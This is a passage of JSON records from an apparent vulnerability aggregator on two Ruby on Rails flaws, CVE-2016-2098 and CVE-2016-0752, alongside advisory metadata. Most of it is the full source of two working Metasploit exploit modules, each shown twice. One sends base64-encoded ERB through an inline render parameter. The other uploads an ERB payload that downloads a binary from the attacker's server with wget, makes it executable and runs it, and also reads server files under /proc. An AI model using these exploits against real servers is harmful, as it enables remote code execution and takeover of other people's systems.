"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:53", "description": "", "cvss3": {}, "published": "2016-07-09T00:00:00", "type": "packetstorm", "title": "Ruby On Rails ActionPack Inline ERB Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-07-09T00:00:00", "id": "PACKETSTORM:137834", "href": "https://packetstormsecurity.com/files/137834/Ruby-On-Rails-ActionPack-Inline-ERB-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote 
\nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in the \ninline request processor of the Ruby on Rails ActionPack component. \nThis vulnerability allows an attacker to process ERB to the inline \nJSON processor, which is then rendered, permitting full RCE within \nthe runtime, without logging an error condition. \n}, \n'Author' => \n[ \n'RageLtMan <rageltman[at]sempervictus>' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-2098' ] \n], \n'Platform' => 'ruby', \n'Arch' => ARCH_RUBY, \n'Privileged' => false, \n'Targets' => [ ['Automatic', {} ] ], \n'DisclosureDate' => 'Mar 1 2016', \n'DefaultOptions' => { \n\"PrependFork\" => true \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', \"/\"]), \nOptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id']) \n], self.class) \n \nend \n \ndef json_request \ncode = Rex::Text.encode_base64(payload.encoded) \nreturn { \ndatastore['TARGETPARAM'] => {\"inline\" => \"<%= eval(%[#{code}].unpack(%[m0])[0]) %>\"} \n}.to_json \nend \n \ndef exploit \nprint_status(\"Sending inline code to parameter: #{datastore['TARGETPARAM']}\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => 'application/json' \n}, \n'data' => json_request \n}, 25) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137834/rails_actionpack_inline_exec.rb.txt"}, {"lastseen": "2016-12-05T22:13:03", "description": "", "cvss3": {}, "published": 
"2016-10-13T00:00:00", "type": "packetstorm", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2016-10-13T00:00:00", "id": "PACKETSTORM:139143", "href": "https://packetstormsecurity.com/files/139143/Ruby-on-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution.html", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in the explicit render \nmethod when leveraging user parameters. \nThis module has been tested across multiple versions of Ruby on Rails. \nThe technique used by this module requires the specified \nendpoint to be using dynamic render paths, such as the following example: \n \ndef show \nrender params[:id] \nend \n \nAlso, the vulnerable target will need a POST endpoint for the TempFile upload, this \ncan literally be any endpoint. This module doesnt use the log inclusion method of \nexploitation due to it not being universal enough. Instead, a new code injection \ntechnique was found and used whereby an attacker can upload temporary image files \nagainst any POST endpoint and use them for the inclusion attack. Finally, you only \nget one shot at this if you are testing with the builtin rails server, use caution. 
\n}, \n'Author' => \n[ \n'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector \n'John Poulin (forced-request)' # original render bug finder \n], \n'References' => \n[ \n[ 'CVE', '2016-0752'], \n[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch \n[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 \n[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit \n], \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'bsd'], \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 16 2016')) \nregister_options( \n[ \nOpt::RPORT(3000), \nOptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]), \nOptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), \n], self.class) \nend \n \ndef check \n \n# this is the check for the dev environment \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"), \n'method' => 'GET', \n}, 60) \n \n# if the page controller is dynamically rendering, its for sure vuln \nif res and res.body =~ /render params/ \nreturn CheckCode::Vulnerable \nend \n \n# this is the check for the prod environment \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"), \n'method' => 'GET', \n}, 60) \n \n# if we can read files, its likley we can execute code \nif res and res.body =~ /ruby/ \nreturn CheckCode::Appears \nend \nreturn CheckCode::Safe \nend \n \ndef on_request_uri(cli, request) \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend 
\nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@elf_sent = true \nsend_response(cli, @pl) \nend \n \ndef send_payload \n@bd = rand_text_alpha(8+rand(8)) \nfn = rand_text_alpha(8+rand(8)) \nun = rand_text_alpha(8+rand(8)) \npn = rand_text_alpha(8+rand(8)) \nregister_file_for_cleanup(\"/tmp/#{@bd}\") \ncmd = \"wget #{@service_url} -O /tmp/#{@bd};\" \ncmd << \"chmod 755 /tmp/#{@bd};\" \ncmd << \"/tmp/#{@bd}\" \npay = \"<%=`#{cmd}`%>\" \nprint_status(\"uploading image...\") \ndata = Rex::MIME::Message.new \ndata.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"') \nres = send_request_cgi({ \n'method' => 'POST', \n'cookie' => @cookie, \n'uri' => normalize_uri(datastore['URIPATH'], pn), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s \n}) \nif res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/ \n@path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/ \nreturn true \nelse \n \n# this is where we pull the log file \nif leak_log \nreturn true \nend \nend \nreturn false \nend \n \ndef leak_log \n \n# path to the log /proc/self/fd/7 \n# this bypasses the extension check \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"), \n'method' => 'GET', \n}, 60) \n \nif res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/ \n@path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/ \nreturn true \nend \nreturn false \nend \n \ndef start_http_server \n@pl = generate_payload_exe \n@elf_sent = false \ndownfile = rand_text_alpha(8+rand(8)) \nresource_uri = '/' + downfile \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \n# do not use SSL for the attacking web server \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \n@service_url 
= \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\" \nservice_url_payload = srv_host + resource_uri \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\") \nstart_service({'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => resource_uri \n}}) \ndatastore['SSL'] = true if ssl_restore \nconnect \nend \n \ndef render_tmpfile \n@path.gsub!(/\\//, '%2f') \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], @path), \n'method' => 'GET', \n}, 1) \nend \n \ndef exploit \nprint_status(\"Sending initial request to detect exploitability\") \nstart_http_server \nif send_payload \nprint_good(\"injected payload\") \nrender_tmpfile \n \n# we need to delay, for the stager \nselect(nil, nil, nil, 5) \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139143/rails_dynamic_render_code_exec.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-10-26T15:04:54", "description": "A remote code execution vulnerability exists in Ruby on Rails. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-07-19T00:00:00", "type": "checkpoint_advisories", "title": "Ruby on Rails Remote Code Execution (CVE-2016-2098)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2022-10-26T00:00:00", "id": "CPAI-2016-0626", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-19T18:07:49", "description": "A directory traversal vulnerability exists in Ruby on Rails. 
Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-19T00:00:00", "type": "checkpoint_advisories", "title": "Ruby On Rails Directory Traversal (CVE-2016-0752)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-04-19T00:00:00", "id": "CPAI-2016-1173", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "canvas": [{"lastseen": "2021-07-28T14:33:32", "description": "**Name**| rails_actionpack_render \n---|--- \n**CVE**| CVE-2016-2098 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| rails_actionpack_render \n**Notes**| CVE Name: CVE-2016-2098 \nVENDOR: http://rubyonrails.org \nNotes: \n \nThis vulnerability affects ActionPack gem and it allows remote attackers to execute arbitrary Ruby Code due to the unsafe use of the 'render' method. Web applications that pass unverified user input to the 'render' method in a controller or a view could be vulnerable to code injection. 
\nThe first issue here is that the 'render' method accepts a hash parameter as input parameter. The second issue is triggered when the method receives a hash parameter with a key named as one of the render options such as html, plain, inline, etc. The method uses it in the same way as 'render key: value', for example if you use { 'plain' : 'HELLO' } as a parameter this is the same as calling 'render plain: \"HELLO\"'. Using { 'inline' : '' } will give you code execution. \nThe POST parameters seem to be non exploitable to this vulnerability due to the post_params method that checks all parameters against a whitelist. \n \n \nRepeatability: Infinite \nCVE URL: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2098 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "canvas", "title": "Immunity Canvas: RAILS_ACTIONPACK_RENDER", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T23:59:00", "id": "RAILS_ACTIONPACK_RENDER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/rails_actionpack_render", "sourceData": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-11T11:51:47", "description": "Exploit for ruby platform in category remote exploits", "cvss3": {}, "published": "2016-07-11T00:00:00", "type": "zdt", "title": "Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-07-11T00:00:00", "id": "1337DAY-ID-25434", "href": "https://0day.today/exploit/description/25434", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the\r\n inline request processor of the Ruby on Rails ActionPack component.\r\n This vulnerability allows an attacker to process ERB to the inline\r\n JSON processor, which is then rendered, permitting full RCE within\r\n the runtime, without logging an error condition.\r\n },\r\n 'Author' =>\r\n [\r\n 'RageLtMan <rageltman[at]sempervictus>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2098' ]\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' => [ ['Automatic', {} ] ],\r\n 'DisclosureDate' => 'Mar 1 2016',\r\n 'DefaultOptions' => {\r\n \"PrependFork\" => true\r\n },\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', \"/\"]),\r\n OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])\r\n ], self.class)\r\n \r\n 
end\r\n \r\n def json_request\r\n code = Rex::Text.encode_base64(payload.encoded)\r\n return {\r\n datastore['TARGETPARAM'] => {\"inline\" => \"<%= eval(%[#{code}].unpack(%[m0])[0]) %>\"}\r\n }.to_json\r\n end\r\n \r\n def exploit\r\n print_status(\"Sending inline code to parameter: #{datastore['TARGETPARAM']}\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'ctype' => 'application/json',\r\n 'headers' => {\r\n 'Accept' => 'application/json'\r\n },\r\n 'data' => json_request\r\n }, 25)\r\n end\r\nend\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/25434", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T07:18:13", "description": "This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. 
Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.", "cvss3": {}, "published": "2016-10-15T00:00:00", "type": "zdt", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2016-10-15T00:00:00", "id": "1337DAY-ID-25576", "href": "https://0day.today/exploit/description/25576", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of Ruby on Rails.\r\n The technique used by this module requires the specified\r\n endpoint to be using dynamic render paths, such as the following example:\r\n\r\n def show\r\n render params[:id]\r\n end\r\n\r\n Also, the vulnerable target will need a POST endpoint for the TempFile upload, this\r\n can literally be any endpoint. This module doesnt use the log inclusion method of\r\n exploitation due to it not being universal enough. Instead, a new code injection\r\n technique was found and used whereby an attacker can upload temporary image files\r\n against any POST endpoint and use them for the inclusion attack. 
Finally, you only\r\n get one shot at this if you are testing with the builtin rails server, use caution.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <[email\u00a0protected]>', # necromanced old bug & discovered new vector rce vector\r\n 'John Poulin (forced-request)' # original render bug finder\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-0752'],\r\n [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch\r\n [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016\r\n [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['linux', 'bsd'],\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2016'))\r\n register_options(\r\n [\r\n Opt::RPORT(3000),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n # this is the check for the dev environment\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n # if the page controller is dynamically rendering, its for sure vuln\r\n if res and res.body =~ /render params/\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n # this is the check for the prod environment\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n # if we can read files, its likley we can execute code\r\n if res and res.body =~ /ruby/\r\n return 
CheckCode::Appears\r\n end\r\n return CheckCode::Safe\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def send_payload\r\n @bd = rand_text_alpha(8+rand(8))\r\n fn = rand_text_alpha(8+rand(8))\r\n un = rand_text_alpha(8+rand(8))\r\n pn = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n cmd = \"wget #{@service_url} -O /tmp/#{@bd};\"\r\n cmd << \"chmod 755 /tmp/#{@bd};\"\r\n cmd << \"/tmp/#{@bd}\"\r\n pay = \"<%=`#{cmd}`%>\"\r\n print_status(\"uploading image...\")\r\n data = Rex::MIME::Message.new\r\n data.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"')\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => @cookie,\r\n 'uri' => normalize_uri(datastore['URIPATH'], pn),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => data.to_s\r\n })\r\n if res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/\r\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/\r\n return true\r\n else\r\n\r\n # this is where we pull the log file\r\n if leak_log\r\n return true\r\n end\r\n end\r\n return false\r\n end\r\n\r\n def leak_log\r\n\r\n # path to the log /proc/self/fd/7\r\n # this bypasses the extension check\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n if res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\r\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + 
downfile\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n @service_url = \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\"\r\n service_url_payload = srv_host + resource_uri\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def render_tmpfile\r\n @path.gsub!(/\\//, '%2f')\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], @path),\r\n 'method' => 'GET',\r\n }, 1)\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n start_http_server\r\n if send_payload\r\n print_good(\"injected payload\")\r\n render_tmpfile\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25576", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "saint": [{"lastseen": "2023-02-08T15:36:49", "description": "Added: 11/11/2016 \nCVE: [CVE-2016-0752](<https://vulners.com/cve/CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. 
\n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:CE3D4DD89AD93E07E9236060DF64D24F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-10T12:21:30", "description": "Added: 11/11/2016 \nCVE: [CVE-2016-0752](<https://vulners.com/cve/CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. 
\n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. \n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:C60C9FE23283E404383AF2811DAC7B9A", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 